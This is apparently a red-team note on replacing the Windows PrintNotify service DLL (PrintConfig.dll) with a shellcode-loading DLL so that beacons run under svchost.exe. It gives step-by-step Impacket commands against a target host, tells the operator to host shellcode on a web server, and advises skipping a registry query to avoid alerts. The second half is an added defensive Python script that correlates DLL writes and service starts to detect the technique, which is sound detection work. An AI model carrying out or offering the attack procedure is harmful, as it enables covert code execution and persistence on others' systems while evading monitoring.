The PrintNotify Windows service uses unsigned DLLs on most systems. An Administrator-level attacker may overwrite the existing service DLL to execute beacons under svchost.exe without suspicion.
Note that while this approach does result in a clean process tree, it can require starting the RemoteRegistry service, which is itself an IOC.
First query the service and ensure it is not already started. Windows does NOT SUPPORT stopping the PrintNotify service.
```
services.py domain.com/user@10.10.10.10 status -name 'PrintNotify'
```
You may then choose to confirm the DLL path by reading the service's Parameters key. However, this will start the Remote Registry service and will almost certainly create alerts. Consider instead overwriting the DLL at the known default path without querying.

Known default path:

```
C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll
```

DANGEROUS (starts Remote Registry):

```
reg.py domain.com/user@10.10.10.10 query -key "HKLM\SYSTEM\CurrentControlSet\Services\PrintNotify\Parameters"
```
- Generate your shellcode and host it on a web server.
- Update the hardcoded URL in the C++ template.
- Compile the service DLL in Visual Studio (use Debug build configuration -> statically linked).
Replace the DLL (be sure to get a backup of the old DLL):

```
smbclient.py domain.com/user@10.10.10.10
```

Execute the service:

```
services.py domain.com/user@10.10.10.10 start -name 'PrintNotify'
```
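From the defender's side, the IOCs this note calls out (a write to the PrintNotify service DLL, a PrintNotify start shortly afterwards, and a RemoteRegistry start on the same host) can be correlated in a single pass over host telemetry. The script below is an added example, not code from the original note or from any product: the pipe-delimited record format, the host names and the timestamps are constructed for illustration, and the `svc_running` and `file_write` kinds stand in for System event 7036 and a Sysmon file-create/write event respectively.

```python
"""Correlate constructed Windows event records to flag the PrintNotify DLL
replacement pattern: a write to the service DLL path followed by a PrintNotify
service start, with a RemoteRegistry start in the same window raising severity.
All sample records here are constructed for the example, not real telemetry."""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Default PrintNotify service DLL path (compared case-insensitively below).
PRINTNOTIFY_DLL = r"C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll"


@dataclass
class Event:
    ts: datetime
    host: str
    kind: str      # "svc_running" (System 7036) or "file_write" (Sysmon file event)
    subject: str   # service name for svc_running, full file path for file_write


def parse_line(line: str) -> Event:
    """Parse one constructed record of the form '<ISO time>|<host>|<kind>|<subject>'."""
    ts, host, kind, subject = line.split("|", 3)
    return Event(datetime.fromisoformat(ts), host, kind, subject)


def detect_printnotify_dll_swap(lines, window=timedelta(minutes=30)):
    """Return one finding per PrintNotify start that was preceded, within
    `window` on the same host, by a write to the PrintNotify DLL path.
    A RemoteRegistry start in the same window marks the finding as high severity."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e.ts)
    findings = []
    for e in events:
        if e.kind != "svc_running" or e.subject.lower() != "printnotify":
            continue
        earliest = e.ts - window
        same_host = [x for x in events if x.host == e.host and earliest <= x.ts <= e.ts]
        dll_writes = [x for x in same_host
                      if x.kind == "file_write"
                      and x.subject.lower() == PRINTNOTIFY_DLL.lower()]
        if not dll_writes:
            continue  # a PrintNotify start with no preceding DLL write is normal
        remote_reg = any(x.kind == "svc_running" and x.subject.lower() == "remoteregistry"
                         for x in same_host)
        findings.append({
            "host": e.host,
            "severity": "high" if remote_reg else "medium",
            "dll_written_at": dll_writes[0].ts.isoformat(),
            "service_started_at": e.ts.isoformat(),
            "remote_registry_started": remote_reg,
        })
    return findings


# Constructed sample telemetry: WS01 is benign, WS02 matches the full pattern.
SAMPLE_LOG = [
    "2024-01-10T09:00:00|WS01|svc_running|Spooler",
    "2024-01-10T09:01:00|WS01|svc_running|PrintNotify",
    "2024-01-10T10:00:00|WS02|svc_running|RemoteRegistry",
    r"2024-01-10T10:02:30|WS02|file_write|C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll",
    "2024-01-10T10:03:00|WS02|svc_running|PrintNotify",
]

if __name__ == "__main__":
    for finding in detect_printnotify_dll_swap(SAMPLE_LOG):
        print(finding)
```

Because PrintNotify cannot be stopped once running, a DLL write that lands while the service is already up will not be followed by a start event on that host; pairing the file-write rule with a baseline of the DLL's expected hash or signature covers that gap.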